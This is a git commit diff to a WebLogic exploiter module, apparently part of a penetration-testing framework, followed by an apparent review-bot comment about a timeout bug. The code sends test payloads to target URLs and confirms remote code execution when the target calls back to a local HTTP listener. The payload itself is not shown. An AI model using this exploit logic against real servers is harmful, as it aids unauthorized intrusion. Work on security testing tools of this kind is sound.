Improved the speed of weblogic exploiter

VakarisZ 2019-01-24 17:28:44 +02:00
parent c38793b527
commit 6073e9f677
1 changed files with 31 additions and 5 deletions


@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading import threading
import logging import logging
import time
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds # How long should be wait after each request in seconds
REQUEST_DELAY = 0.0001
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
def check_if_exploitable(self, url): def add_vulnerable_urls(self, urls):
"""
Overrides parent method to use listener server
"""
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
exploitable = False
for url in urls:
if self.check_if_exploitable(url, httpd):
exploitable = True
break
if not exploitable and httpd.get_requests < 1:
# Wait for responses
time.sleep(REQUEST_TIMEOUT)
if httpd.get_requests > 0:
# Add all urls because we don't know which one is vulnerable
self.vulnerable_urls.extend(urls)
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
else:
LOG.info("No vulnerable urls found, skipping.")
self._stop_http_server(httpd, lock)
def check_if_exploitable(self, url, httpd):
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0 return httpd.get_requests > 0
def _start_http_server(self): def _start_http_server(self):
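Review bot: In `check_if_exploitable`, `timeout=REQUEST_DELAY` passes a single float, which (assuming `post` and `exceptions` come from requests) applies to the connect phase as well as the read phase, so with `REQUEST_DELAY = 0.0001` the call will most likely time out while connecting, before the request is sent. That error is not `exceptions.ReadTimeout`, so it falls into the generic `except Exception` branch, logs an error for every URL, and the check ends up reporting a false negative. A tuple keeps the short read wait and gives the connection a realistic budget, for example `timeout=(REQUEST_TIMEOUT, REQUEST_DELAY)`. Separately, in `add_vulnerable_urls` the call `self._stop_http_server(httpd, lock)` is reached only on the normal path, and `get_test_payload` sits outside the `try`, so wrapping the loop and the wait in `try:` / `finally:` would keep the listener from staying bound after an unexpected error.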